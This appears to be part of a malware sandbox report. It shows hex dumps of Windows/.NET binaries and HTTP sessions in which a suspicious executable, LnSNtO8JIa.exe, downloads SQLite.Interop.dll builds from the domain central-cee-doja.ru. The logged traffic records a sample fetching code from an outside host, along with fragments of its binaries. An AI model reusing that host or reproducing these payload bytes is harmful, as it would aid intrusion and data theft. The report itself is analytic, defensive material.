00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0 @`
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 00 00 0a 0d 2b 41 09 6f 29 00 00 0a 74 1b 00 00 01 08 2c 04 16 0c 2b 0c 06 72 39 00 00 70 6f 22 00 00 0a 26 25 6f 2a 00 00 0a 07 6f 25 00 00 0a 06 72 3f 00 00 70 6f 22 00 00 0a 26 6f 2b 00 00 0a 07 6f 25 00 00 0a 09 6f 13 00 00 0a 2d b7 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 2c 2a 07 16 8c a3 00 00 01 1f 0b 6f 73 01 00 06 13 04 06 11 04 6f 2c 00 00 0a 6f 22 00 00 0a 26 06 72 47 00 00 70 6f 22 00 00 0a 26 06 6f 26 00 00 0a 26 06 72 51 00 00 70 6f 22 00 00 0a 26 02 6f 2d 00 00 0a 07 6f 25 00 00 0a 06 72 5f 00 00 70 6f 2e 00 00 0a 26 06 02 07 02 6f 21 00 00 0a 16 28 07 00 00 06 03 07 6f 70 01 00 06 51 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 5f 00 4d ac 00 0a 00 00 00 00 13 30 05 00 6e 00 00 00 02 00 00 11 7e 01 00 00 04 73 20 00 00 0a 25 02 16 72 63 00 00 70
                                                                                    Data Ascii: +Ao)t,+r9po"&%o*o%r?po"&o+o%o-,o,*oso,o"&rGpo"&o&&rQpo"&o-o%r_po.&o!(opQo/*_M0n~s %rcp
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 05 fe 16 0b 00 00 1b 6f 12 00 00 0a dc 0e 04 2c 37 02 72 71 01 00 70 6f 22 00 00 0a 26 02 72 ce 02 00 70 28 f2 00 00 06 6f 22 00 00 0a 26 02 72 3f 00 00 70 6f 22 00 00 0a 26 02 72 7d 01 00 70 6f 2e 00 00 0a 26 2b 26 72 da 02 00 70 09 2d 07 72 19 02 00 70 2b 06 09 6f 34 00 00 0a 06 6f 40 00 00 0a 28 41 00 00 0a 73 42 00 00 0a 7a 02 72 5f 00 00 70 6f 2e 00 00 0a 26 2a 00 01 10 00 00 02 00 0c 01 9b a7 01 0e 00 00 00 00 2e 20 00 01 00 00 80 01 00 00 04 2a 1e 02 28 44 00 00 0a 2a 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0c 00 00 06 06 6f 2f 00 00 0a 2a 22 02 03 6f 0a 00 00 06 2a 00 00 00 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0a 00 00 06 06 6f 2f 00 00 0a 2a 6a 02 7b 02 00 00 04 2d 0b 02 73 46 00 00 0a 7d 02 00 00
                                                                                    Data Ascii: o,7rqpo"&rp(o"&r?po"&r}po.&+&rp-rp+o4o@(AsBzr_po.&*. *(D*0sEoo/*"o*0sEoo/*j{-sF}
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 00 0e 00 00 00 1d 00 00 00 14 00 00 00 17 00 00 00 1a 00 00 00 20 00 00 00 2b 21 17 2a 19 2a 18 2a 1c 2a 1d 2a 1e 2a 1f 0f 2a 1f 09 2a 1f 0a 2a 1f 0b 2a 1f 0c 2a 1f 0e 2a 1f 10 2a 72 cc 03 00 70 02 8c 1f 00 00 01 28 70 00 00 0a 73 71 00 00 0a 7a 00 13 30 04 00 2f 00 00 00 0f 00 00 11 02 6f 72 00 00 0a 03 16 12 00 6f 73 00 00 0a 2c 1c 06 6f 74 00 00 0a 2c 14 06 6f 75 00 00 0a 2d 0c 06 6f 74 00 00 0a a5 19 00 00 1b 2a 04 2a 72 02 6f 65 00 00 0a 74 7e 00 00 01 6f 76 00 00 0a 03 28 35 00 00 06 6f 77 00 00 0a 2a 1b 30 02 00 3a 00 00 00 10 00 00 11 02 6f 78 00 00 0a 0a 2b 19 06 6f 79 00 00 0a 0b 07 6f 7a 00 00 0a 03 28 7b 00 00 0a 2c 04 07 0c de 16 06 6f 13 00 00 0a 2d df de 0a 06 2c 06 06 6f 12 00 00 0a dc 14 2a 08 2a 00 00 01 10 00 00 02 00 07 00 25 2c 00 0a
                                                                                    Data Ascii: +!*************rp(psqz0/oros,ot,ou-ot**roet~ov(5ow*0:ox+oyoz({,o-,o**%,
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 6f 94 00 00 0a 28 7a 00 00 06 02 03 6f 95 00 00 0a 28 79 00 00 06 0a 06 60 2a 36 02 03 6f 96 00 00 0a 28 7c 00 00 06 2a 00 00 13 30 03 00 30 00 00 00 14 00 00 11 02 03 6f 97 00 00 0a 6f 98 00 00 0a 28 79 00 00 06 02 03 6f 99 00 00 0a 28 7c 00 00 06 0a 02 03 6f 9a 00 00 0a 28 77 00 00 06 0b 06 60 07 60 2a 13 30 03 00 1c 00 00 00 15 00 00 11 02 03 6f 90 00 00 0a 28 79 00 00 06 02 03 6f 91 00 00 0a 28 79 00 00 06 0a 06 60 2a 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9b 00 00 0a 28 7a 00 00 06 02 03 6f 9c 00 00 0a 28 7a 00 00 06 0a 02 03 6f 9d 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 00 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9e 00 00 0a 28 79 00 00 06 02 03 6f 9f 00 00 0a 28 79 00 00 06 0a 02 03 6f a0 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 36 02
                                                                                    Data Ascii: o(zo(y`*6o(|*00oo(yo(|o(w``*0o(yo(y`*0+o(zo(zo(y``*0+o(yo(yo(y``*6
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 0a 25 72 1e 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 28 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 34 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 3c 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 46 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 54 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 62 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 72 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 84 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 94 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 a6 06 00 70 14 fe 06 ce 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25
                                                                                    Data Ascii: %rpso%r(pso%r4pso%r<pso%rFpso%rTpso%rbpso%rrpso%rpso%rpso%rpso%
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 1b 30 03 00 2d 00 00 00 1b 00 00 11 20 00 04 00 00 73 20 00 00 0a 0a 06 73 14 01 00 06 0b 03 07 02 6f 0e 00 00 06 de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 6f 2f 00 00 0a 2a 00 00 00 01 10 00 00 02 00 12 00 0a 1c 00 0a 00 00 00 00 1b 30 04 00 9c 01 00 00 1c 00 00 11 7e 58 00 00 04 73 ce 00 00 0a 0a 02 03 06 28 85 00 00 06 2c 0e 06 6f cf 00 00 0a 28 07 00 00 2b 16 30 05 04 14 51 16 2a 73 4a 00 00 06 0b 17 0c 06 6f cf 00 00 0a 6f d1 00 00 0a 0d 38 3f 01 00 00 09 6f d2 00 00 0a 13 04 06 11 04 6f d3 00 00 0a 13 05 08 2d 0d 07 72 e4 08 00 70 6f 46 00 00 06 2b 02 16 0c 11 05 7e 5a 00 00 04 25 2d 17 26 7e 59 00 00 04 fe 06 ce 01 00 06 73 d4 00 00 0a 25 80 5a 00 00 04 28 08 00 00 2b 13 06 11 06 28 07 00 00 2b 13 07 11 07 17 33 26 02 11 04 07 28 f1 00 00 06 07 72 3f
                                                                                    Data Ascii: 0- s so,oo/*0~Xs(,o(+0Q*sJoo8?oo-rpoF+~Z%-&~Ys%Z(+(+3&(r?
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 06 0a 2b 06 73 88 00 00 0a 7a 06 2a 00 00 00 13 30 05 00 d2 02 00 00 1f 00 00 11 73 4a 00 00 06 0a 03 6f c8 00 00 0a 12 01 28 2e 00 00 06 39 b2 02 00 00 07 45 0f 00 00 00 1b 00 00 00 31 00 00 00 55 00 00 00 6b 00 00 00 cd 00 00 00 64 01 00 00 88 01 00 00 06 02 00 00 6a 02 00 00 dd 01 00 00 05 00 00 00 f3 01 00 00 27 02 00 00 5f 02 00 00 54 02 00 00 38 65 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 5b 02 00 00 03 6f da 00 00 0a 74 34 00 00 1b 06 28 fa 00 00 06 38 45 02 00 00 06 03 6f da 00 00 0a a5 ae 00 00 01 2d 07 72 d6 09 00 70 2b 05 72 da 09 00 70 6f 46 00 00 06 38 21 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 0b 02 00 00 02 7b 15 00 00 04 7b 3d 00 00 04 28 e7 00 00 06 03 6f da 00 00 0a a5 b3 00 00 01 02 7b 15 00
                                                                                    Data Ascii: +sz*0sJo(.9E1Ukdj'_T8eoo/oF8[ot4(8Eo-rp+rpoF8!oo/oF8{{=(o{
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 03 6f c8 00 00 0a 28 0d 00 00 2b 6f 66 00 00 0a 28 0e 00 00 2b 03 6f 9a 00 00 0a 28 fb 00 00 06 0c 08 2c 37 02 07 03 6f 97 00 00 0a 6f e5 00 00 0a 03 6f 97 00 00 0a 6f e6 00 00 0a 16 12 00 28 e6 00 00 06 0d 02 09 03 6f 97 00 00 0a 6f e5 00 00 0a 06 16 28 e3 00 00 06 2b 02 07 0d 6f 6a 00 00 0a 6f e9 00 00 0a 8c 36 00 00 1b 13 04 11 04 6f 13 00 00 0a 26 7e ea 00 00 0a 13 05 03 6f 99 00 00 0a 6f d1 00 00 0a 13 06 38 42 01 00 00 11 06 6f d2 00 00 0a 11 04 6f eb 00 00 0a 6f 34 00 00 0a 28 f2 00 00 06 13 07 09 6f 0b 01 00 06 11 05 6f 46 00 00 06 02 6f 06 00 00 2b 13 08 08 2d 54 09 6f 08 01 00 06 11 05 6f 46 00 00 06 09 6f 08 01 00 06 6f 47 00 00 06 09 6f 08 01 00 06 11 08 6f 46 00 00 06 09 6f 08 01 00 06 72 62 0a 00 70 6f 46 00 00 06 09 6f 08 01 00 06 11 07 6f
                                                                                    Data Ascii: o(+of(+o(,7oooo(oo(+ojo6o&~oo8Booo4(ooFo+-TooFooGooForbpoFoo
                                                                                    2024-01-04 07:30:00 UTC1369INData Raw: 53 00 00 01 0a 06 2c 0d 06 6f b8 00 00 0a 02 6f 06 00 00 2b 2a 03 6f b8 00 00 0a 75 38 00 00 01 0b 07 2c 09 02 07 17 28 be 00 00 06 2a 03 6f b8 00 00 0a 75 52 00 00 01 0c 08 2c 09 02 08 17 28 c0 00 00 06 2a 03 6f b8 00 00 0a 75 51 00 00 01 0d 09 2c 22 09 6f bc 00 00 0a 1f 0d 33 18 02 72 cc 09 00 70 09 6f 90 00 00 0a 09 6f 91 00 00 0a 28 bc 00 00 06 2a 73 4a 00 00 06 25 72 18 0b 00 70 6f 46 00 00 06 25 03 6f b8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 46 73 4a 00 00 06 25 72 26 0b 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 27 00 00 00 19 00 00 11 14 0a 02 03 12 00 28 8f 00 00 06 2c 02 06 2a 02 72 e4 08 00 70 03 6f 90 00 00 0a 03 6f 91 00 00 0a 28 bc 00 00 06 2a 72 73 4a 00 00 06 25 72 30 0b 00 70 03 6f f3 00 00 0a 28
                                                                                    Data Ascii: S,oo+*ou8,(*ouR,(*ouQ,"o3rpoo(*sJ%rpoF%oo+oF%rpoF*FsJ%r&poF*0'(,*rpoo(*rsJ%r0po(


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.649717104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:01 UTC72OUTGET /dlls/x86/SQLite.Interop.dll HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:01 UTC680INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:01 GMT
                                                                                    Content-Type: application/x-msdos-program
                                                                                    Content-Length: 1374512
                                                                                    Connection: close
                                                                                    Last-Modified: Tue, 02 Nov 2021 17:47:02 GMT
                                                                                    ETag: "14f930-5cfd1e1811180"
                                                                                    Accept-Ranges: bytes
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zHSX3zzfFNk80vzBUGvhfqIilPLT0u7IeVVj3vOSlRhOaaA%2FN5ma2OseXStED8c%2FEss1544lYmRWxmY%2FVQwLeH7NBXthwSSiG6u0%2BHAKGyTic%2BOPLg6rUv0%2Bt2hUSIX3j8n00S6E"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c615a90b5800-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:01 UTC689INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a b2 68 a3 de d3 06 f0 de d3 06 f0 de d3 06 f0 6a 4f f7 f0 ef d3 06 f0 6a 4f f5 f0 5e d3 06 f0 6a 4f f4 f0 f9 d3 06 f0 e5 8d 05 f1 c9 d3 06 f0 e5 8d 03 f1 c8 d3 06 f0 e5 8d 02 f1 d1 d3 06 f0 03 2c cd f0 d6 d3 06 f0 c0 81 95 f0 dd d3 06 f0 de d3 07 f0 46 d3 06 f0 49 8d 0e f1 df d3 06 f0 49 8d 06 f1 df d3 06 f0 4c 8d f9 f0 df d3 06 f0 49 8d 04 f1 df d3 06 f0 52 69 63 68 de d3 06
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hjOjO^jO,FIILIRich
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 72 73 72 63 00 00 00 94 08 00 00 00 60 14 00 00 0a 00 00 00 24 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 89 00 00 00 70 14 00 00 8a 00 00 00 2e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: rsrc`$@@.relochp.@B
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 83 7d 10 00 0f 95 c0 0f b6 c0 50 e8 17 01 00 00 59 5d c2 0c 00 6a 10 68 70 dd 13 10 e8 65 08 00 00 6a 00 e8 06 04 00 00 59 84 c0 75 07 33 c0 e9 e0 00 00 00 e8 f8 02 00 00 88 45 e3 b3 01 88 5d e7 83 65 fc 00 83 3d 30 3a 14 10 00 74 07 6a 07 e8 ab 06 00 00 c7 05 30 3a 14 10 01 00 00 00 e8 2d 03 00 00 84 c0 74 65 e8 b6 07 00 00 68 58 1c 00 10 e8 91 05 00 00 e8 43 06 00 00 c7 04 24 d5 1a 00 10 e8 80 05 00 00 e8 50 06 00 00 c7 04 24 60 82 11 10 68 4c 82 11 10 e8 e8 56 00 00 59 59 85 c0 75 29 e8 bd 02 00 00 84 c0 74 20 68 48 82 11 10 68 44 82 11 10 e8 6e 56 00 00 59 59 c7 05 30 3a 14 10 02 00 00 00 32 db 88 5d e7 c7 45 fc fe ff ff ff e8 44 00 00 00 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 3e 00 74 1e 56 e8 0b 04 00 00 59 84 c0 74 13 ff 75 0c 6a 02 ff 75
                                                                                    Data Ascii: }PY]jhpejYu3E]e=0:tj0:-tehXC$P$`hLVYYu)t hHhDnVYY0:2]EDL>tVYtuju
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 45 fc fe ff ff ff b0 01 eb 1f 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 32 c0 e8 45 03 00 00 c3 55 8b ec e8 ef 04 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 34 3a 14 10 87 01 5d c3 55 8b ec 80 3d 50 3a 14 10 00 74 06 80 7d 0c 00 75 12 ff 75 08 e8 cb 60 00 00 ff 75 08 e8 74 0d 00 00 59 59 b0 01 5d c3 55 8b ec a1 04 10 14 10 8b c8 33 05 38 3a 14 10 83 e1 1f ff 75 08 d3 c8 83 f8 ff 75 07 e8 ee 5e 00 00 eb 0b 68 38 3a 14 10 e8 52 5f 00 00 59 f7 d8 59 1b c0 f7 d0 23 45 08 5d c3 55 8b ec ff 75 08 e8 ba ff ff ff f7 d8 59 1b c0 f7 d8 48 5d c3 55 8b ec 83 ec 14 83 65 f4 00 83 65 f8 00 a1 04 10 14 10 56 57 bf 4e e6 40 bb be 00 00 ff ff 3b c7 74 0d 85 c6 74 09 f7 d0 a3 00 10 14 10 eb 66 8d 45 f4 50 ff 15 28 81 11 10 8b
                                                                                    Data Ascii: EE38eE2EUt}u34:]U=P:t}uu`utYY]U38:uu^h8:R_YY#E]UuYH]UeeVWN@;ttfEP(
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 94 02 00 00 83 f9 20 0f 82 d2 04 00 00 81 f9 80 00 00 00 73 13 0f ba 25 10 10 14 10 01 0f 82 8e 04 00 00 e9 e3 01 00 00 0f ba 25 70 3a 14 10 01 73 09 f3 a4 8b 44 24 0c 5e 5f c3 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 10 10 14 10 01 0f 82 e0 03 00 00 0f ba 25 70 3a 14 10 00 0f 83 a9 01 00 00 f7 c7 03 00 00 00 0f 85 9d 01 00 00 f7 c6 03 00 00 00 0f 85 ac 01 00 00 0f ba e7 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 65 0f ba e6 03 0f 83 b4 00 00 00 66 0f 6f 4e f4 8d 76 f4 8b ff 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 0c 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 0c
                                                                                    Data Ascii: s%%p:sD$^_3u%%p:svs~vftefoNvfo^0foF fon0v00fof:ffof:fGfof:
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 57 83 3d 6c 3a 14 10 01 0f 82 fd 00 00 00 8b 7d 08 77 77 0f b6 55 0c 8b c2 c1 e2 08 0b d0 66 0f 6e da f2 0f 70 db 00 0f 16 db b9 0f 00 00 00 23 cf 83 c8 ff d3 e0 2b f9 33 d2 f3 0f 6f 0f 66 0f ef d2 66 0f 74 d1 66 0f 74 cb 66 0f d7 ca 23 c8 75 18 66 0f d7 c9 23 c8 0f bd c1 03 c7 85 c9 0f 45 d0 83 c8 ff 83 c7 10 eb d0 53 66 0f d7 d9 23 d8 d1 e1 33 c0 2b c1 23 c8 49 23 cb 5b 0f bd c1 03 c7 85 c9 0f 44 c2 5f c9 c3 0f b6 55 0c 85 d2 74 39 33 c0 f7 c7 0f 00 00 00 74 15 0f b6 0f 3b ca 0f 44 c7 85 c9 74 20 47 f7 c7 0f 00 00 00 75 eb 66 0f 6e c2 83 c7 10 66 0f 3a 63 47 f0 40 8d 4c 0f f0 0f 42 c1 75 ed 5f c9 c3 b8 f0 ff ff ff 23 c7 66 0f ef c0 66 0f 74 00 b9 0f 00 00 00 23 cf ba ff ff ff ff d3 e2 66 0f d7 f8 23 fa 75 14 66
                                                                                    Data Ascii: UW=l:}wwUfnp#+3offtftf#uf#ESf#3+#I#[D_Ut93t;Dt Gufnf:cG@LBu_#fft#f#uf
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 00 00 eb b0 64 8f 05 00 00 00 00 83 c4 18 5f 5e 5b c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 33 8b 44 24 08 8b 48 08 33 c8 e8 1c e8 ff ff 55 8b 68 18 ff 70 0c ff 70 10 ff 70 14 e8 3e ff ff ff 83 c4 0c 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 55 ff 74 24 08 e8 c5 f4 ff ff 83 c4 04 8b 4c 24 08 8b 29 ff 71 1c ff 71 18 ff 71 28 e8 09 ff ff ff 83 c4 0c 5d c2 04 00 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 8b ea 8b f1 8b c1 6a 01 e8 03 06 00 00 33 c0 33 db 33 c9 33 d2 33 ff ff e6 55 8b ec 53 56 57 6a 00 52 68 32 2a 00 10 51 e8 0c 25 01 00 5f 5e 5b 5d c3 55 8b 6c 24 08 52 51 ff 74 24 14 e8 a9 fe ff ff 83 c4 0c 5d c2 08 00 55 8b ec 8b 45 08 85 c0 74 0e 3d 74 3a 14 10 74 07 50 e8 8f 50 00 00 59 5d c2 04 00 55 8b ec
                                                                                    Data Ascii: d_^[L$At3D$H3Uhppp>]D$T$Ut$L$)qqq(]UVWS33333[_^]j33333USVWjRh2*Q%_^[]Ul$RQt$]UEt=t:tPPY]U
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 04 10 14 10 83 e0 1f 6a 20 59 2b c8 33 c0 d3 c8 33 05 04 10 14 10 a3 ec 3a 14 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 56 57 55 6a 00 6a 00 68 18 2f 00 10 ff 75 08 e8 26 20 01 00 5d 5f 5e 5b 8b e5 5d c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 32 8b 44 24 14 8b 48 fc 33 c8 e8 7c e2 ff ff 55 8b 68 10 8b 50 28 52 8b 50 24 52 e8 14 00 00 00 83 c4 08 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 53 56 57 8b 44 24 10 55 50 6a fe 68 20 2f 00 10 64 ff 35 00 00 00 00 a1 04 10 14 10 33 c4 50 8d 44 24 04 64 a3 00 00 00 00 8b 44 24 28 8b 58 08 8b 70 0c 83 fe ff 74 3a 83 7c 24 2c ff 74 06 3b 74 24 2c 76 2d 8d 34 76 8b 0c b3 89 4c 24 0c 89 48 0c 83 7c b3 04 00 75 17 68 01 01 00 00 8b 44 b3
                                                                                    Data Ascii: j Y+33:USVWUjjh/u& ]_^[]L$At2D$H3|UhP(RP$R]D$T$SVWD$UPjh /d53PD$dD$(Xpt:|$,t;t$,v-4vL$H|uhD
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 59 59 c3 8b 65 e8 ff 75 e0 e8 73 3b 00 00 cc 8b ff 55 8b ec 56 8b 75 08 85 f6 74 25 83 7e 08 00 74 09 ff 76 08 ff 15 dc 80 11 10 83 7e 0c 00 74 09 ff 76 0c ff 15 20 81 11 10 56 e8 94 46 00 00 59 5e 5d c2 04 00 8b ff 55 8b ec 56 e8 bb 58 00 00 85 c0 75 09 ff 75 08 ff 15 bc 81 11 10 8b b0 60 03 00 00 85 f6 74 ed 80 7e 10 00 74 05 e8 fc 5d 00 00 8b 46 08 83 f8 ff 74 0b 85 c0 74 07 50 ff 15 dc 80 11 10 8b 46 0c 83 f8 ff 74 c7 85 c0 74 c3 ff 75 08 50 ff 15 c0 81 11 10 cc 8b ff 55 8b ec 51 56 6a 14 6a 01 e8 4c 47 00 00 6a 00 8b f0 e8 1e 46 00 00 83 c4 0c 85 f6 74 18 8b 45 0c 8b 4d 08 89 46 04 8d 46 0c 50 51 6a 04 89 0e ff 15 c4 81 11 10 6a 00 8d 4d ff e8 30 ff ff ff 8b c6 5e 8b e5 5d c3 8b ff 55 8b ec 51 51 83 7d 10 00 75 14 e8 b5 1d 00 00 c7 00 16 00 00 00 e8
                                                                                    Data Ascii: YYeus;UVut%~tv~tv VFY^]UVXuu`t~t]FttPFttuPUQVjjLGjFtEMFFPQjjM0^]UQQ}u
                                                                                    2024-01-04 07:30:01 UTC1369INData Raw: 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 10 6a 00 ff 75 08 e8 b4 ff ff ff 59 59 8b c8 eb 0e 8b 4d 08 8d 41 bf 83 f8 19 77 03 83 c1 20 8b c1 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 10 6a 00 ff 75 08 e8 9e ff ff ff 59 59 8b c8 eb 0e 8b 4d 08 8d 41 9f 83 f8 19 77 03 83 c1 e0 8b c1 5d c3 8b ff 55 8b ec 83 ec 14 56 8b 75 08 85 f6 75 13 e8 dd 18 00 00 6a 16 5e 89 30 e8 cd 4e 00 00 8b c6 eb 53 57 6a 09 83 c8 ff 8b fe 59 f3 ab 8b 7d 0c 85 ff 75 13 e8 b8 18 00 00 6a 16 5e 89 30 e8 a8 4e 00 00 8b c6 eb 2d 53 33 db 39 5f 04 7f 06 7c 16 39 1f 72 12 6a 07 58 39 47 04 7c 1d 7f 08 81 3f ff 6f 40 93 76 13 e8 85 18 00 00 6a 16 5e 89 30 8b c6 5b 5f 5e 8b e5 5d c3 e8 61 68 00 00 8d 45 f8 89 5d f8 50 89 5d f4 89 5d fc e8 0d 5e 00 00 59 85 c0 0f 85 e4 01 00 00 8d 45
                                                                                    Data Ascii: ]UD=tjuYYMAw ]UD=tjuYYMAw]UVuuj^0NSWjY}uj^0N-S39_|9rjX9G|?o@vj^0[_^]ahE]P]]^YE


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.649719104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:02 UTC72OUTGET /dlls/x64/SQLite.Interop.dll HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:03 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:03 GMT
                                                                                    Content-Type: application/x-msdos-program
                                                                                    Content-Length: 1763632
                                                                                    Connection: close
                                                                                    Last-Modified: Tue, 02 Nov 2021 17:47:38 GMT
                                                                                    ETag: "1ae930-5cfd1e3a66280"
                                                                                    Accept-Ranges: bytes
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tq6UkqnyYq6O2EPt7k7BVUlmV4LWN3Ekg762lCUWc%2F47McC8E8Kp%2FrH44PvEgsjNM137L19Ff6RY5iHb69Tsz35eb9pjtCBoihnBFNhwmQ3hFFrfhQssOID026GZij0nx7rN%2BzAh"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c61f58a85b34-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
